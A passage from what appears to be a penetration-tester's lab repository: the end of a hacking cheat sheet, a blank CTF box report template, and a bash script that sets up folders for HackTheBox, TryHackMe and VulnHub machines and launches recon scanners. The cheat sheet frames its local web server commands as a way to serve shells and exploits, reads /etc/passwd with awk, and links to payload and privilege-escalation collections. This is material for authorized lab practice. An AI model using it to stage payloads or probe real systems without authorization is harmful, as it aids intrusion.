![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png) 2107 | 2108 | ## Simple Local Web Servers 2109 | 2110 | Python local web server command, handy for serving up shells and exploits on an attacking machine. 2111 | 2112 | ```bash 2113 | python -m SimpleHTTPServer 80 2114 | python3 -m http.server 2115 | python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer 2116 | 2117 | updog 2118 | 2119 | ruby -rwebrick -e "WEBrick::HTTPServer.new 2120 | (:Port => 80, :DocumentRoot => Dir.pwd).start" 2121 | 2122 | php -S 0.0.0.0:80 2123 | ``` 2124 | 2125 | ## Hash Examples 2126 | 2127 | Likely just use **hash-identifier** for this but here are some example hashes: 2128 | 2129 | [Untitled](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%20Database%202c8912d8c7b747859491d93a41439662.csv) 2130 | 2131 | # Text Manipulation 2132 | 2133 | ## [awk](https://www.howtogeek.com/562941/how-to-use-the-awk-command-on-linux/) - command-line text manipulation dynamo 2134 | 2135 | ```bash 2136 | awk -F: '{print $1,$6}' /etc/passwd 2137 | $0: Represents the entire line of text. 2138 | $1: Represents the first field. 2139 | $2: Represents the second field. 2140 | $7: Represents the seventh field. 2141 | $45: Represents the 45th field. 2142 | $NF: Stands for “number of fields,” and represents the last field. 2143 | -F (separator string) 2144 | ``` 2145 | 2146 | ### Sublime Text Editor 2147 | 2148 | ```jsx 2149 | Splitting the Selection into Lines 2150 | 2151 | Select a block of lines, and then split it into many selections, one per line, using: 2152 | 2153 | Windows/Linux: Ctrl+Shift+L 2154 | ``` 2155 | 2156 | ### sed cheat sheet 2157 | 2158 | ![https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png](https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png) 2159 | 2160 | ## Useful links 2161 | 2162 | [A cheat-sheet for password crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers) 2163 | 2164 | [Penetration testing and webapp cheat sheets](https://doxsec.wordpress.com/2017/07/21/penetration-testing-and-webapp-cheat-sheets/) 2165 | 2166 | [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/?utm_medium=Social&utm_source=Twitter&utm_content=EMEA&utm_campaign=Security%20Trends%20Blog) 2167 | 2168 | [](https://www.sans.org/security-resources/posters/blueprint-building-pen-tester/160/download) 2169 | 2170 | [](https://www.sans.org/security-resources/posters/pen-test-pivots-payloads/180/download) 2171 | 2172 | [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) 2173 | 2174 | [Penetrating Testing/Assessment Workflow](https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4) 2175 | 2176 | [0DAYsecurity.com - The fastest resource to a proactive security](http://www.0daysecurity.com/pentest.html) 2177 | 2178 | [OSCP Ultimate CheatSheet - ByteFellow](https://www.bytefellow.com/oscp-ultimate-cheatsheet/) 2179 | 2180 | [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) 2181 | 2182 | [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) 2183 | 2184 | [Cheat Sheet](https://jok3rsecurity.com/cheat-sheet/) 2185 | 2186 | [CountablyInfinite/oscp_cheatsheet](https://github.com/CountablyInfinite/oscp_cheatsheet) 2187 | 2188 | [OSCP: Developing a Methodology](https://falconspy.medium.com/oscp-developing-a-methodology-32f4ab471fd6) 2189 | 2190 | [Passing OSCP](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html) 2191 | 2192 | [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) 2193 | 2194 | [](https://storage.googleapis.com/vkmedia-wp-blogg-vk/uploads/uploads/sites/710/2013/08/Linux-101-Hacks.pdf) 2195 | 2196 | -------------------------------------------------------------------------------- /report.md: -------------------------------------------------------------------------------- 1 | * * * 2 | ## *Platform* 3 | 4 | 5 | 6 | * * * 7 | ## *Box Name* 8 | 9 | 10 | 11 | * * * 12 | ## *IP* 13 | 14 | 15 | 16 | * * * 17 | ## *Ports Found* 18 | 19 | 20 | 21 | * * * 22 | ## *Code* 23 | 24 | ```bash 25 | 26 | 27 | ``` 28 | 29 | * * * 30 | ## *Operating System* 31 | 32 | 33 | 34 | * * * 35 | ## *Users* 36 | 37 | 38 | 39 | * * * 40 | ## *Passwords* 41 | 42 | 43 | 44 | 45 | * * * 46 | ## *Credentials* 47 | 48 | 49 | 50 | * * * 51 | ## *Information Disclosure (Software Used)* 52 | 53 | 54 | 55 | * * * 56 | ## *Flags* 57 | 58 | user: 59 | 60 | root: 61 | 62 | 63 | * * * 64 | ## *Notes* 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /skel.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | clear 4 | echo -e "\e[7;96m Which platform are you on? \e[0m" 5 | echo -e 1. "\e[1;92m Hackthebox \e[0m" 6 | echo -e 2. "\e[1;91m Tryhackme \e[0m" 7 | echo -e 3. "\e[1;94m Vulnhub \e[0m" 8 | 9 | read input 10 | 11 | if [ $input = 1 ] 12 | then 13 | platform=hackthebox 14 | elif [ $input = 2 ] 15 | then 16 | platform=tryhackme 17 | elif [ $input = 3 ] 18 | then 19 | platform=vulnhub 20 | else 21 | echo Please put a valid number! 22 | fi 23 | 24 | echo 25 | echo -e "\e[7;96m What is the name of the box? \e[0m" 26 | 27 | read boxname 28 | 29 | 30 | mkdir ~/Documents/labs/$platform/$boxname 31 | cd ~/Documents/labs/$platform/$boxname 32 | 33 | cp /home/hasamba/Documents/scripts/report.md . 34 | 35 | echo 36 | echo -e "\e[7;96m what is the box IP? \e[0m" 37 | read ip 38 | echo $ip > ip.txt 39 | 40 | mv report.md $platform-$boxname-$ip.md 41 | subl $platform-$boxname-$ip.md 42 | copyq show $boxname 43 | copyq config clipboard_tab $boxname 44 | 45 | #copy variables to clipboard to use with CopyQ 46 | sleep 1 47 | echo -n $platform | xclip -selection clipboard 48 | sleep 1 49 | echo -n $boxname | xclip -selection clipboard 50 | sleep 1 51 | echo -n $ip | xclip -selection clipboard 52 | sleep 1 53 | echo -n cd ~/Documents/labs/$platform/$boxname | xclip -selection clipboard 54 | 55 | echo 56 | echo -e "\e[7;96m Would you like to start extra scripts & open web browser? \e[0m" 57 | echo -e "1.\e[1;95m NmapAutomator \e[0m" 58 | echo -e "2.\e[1;93m Legion Framework (Type 'Run' after load) \e[0m" 59 | echo -e "3.\e[1;94m AutoRecon \e[0m" 60 | echo -e "9.\e[1;90m Nothing \e[0m" 61 | 62 | read input2 63 | 64 | if [ $input2 = 1 ] 65 | then 66 | clear 67 | firefox $ip 68 | nmapAutomator.sh $ip All 69 | elif [ $input2 = 2 ] 70 | then 71 | clear 72 | firefox $ip 73 | sudo ~/tools/legion/legion.py --host $ip --workdir ~/Documents/labs/$platform/$boxname/legion 74 | elif [ $input2 = 3 ] 75 | then 76 | clear 77 | autorecon $ip -o ~/Documents/labs/$platform/$boxname/autorecon -vv 78 | fi 79 | echo 80 | echo -e "\e[7;96m New Folder is ready @: \e[0m" 81 | pwd --------------------------------------------------------------------------------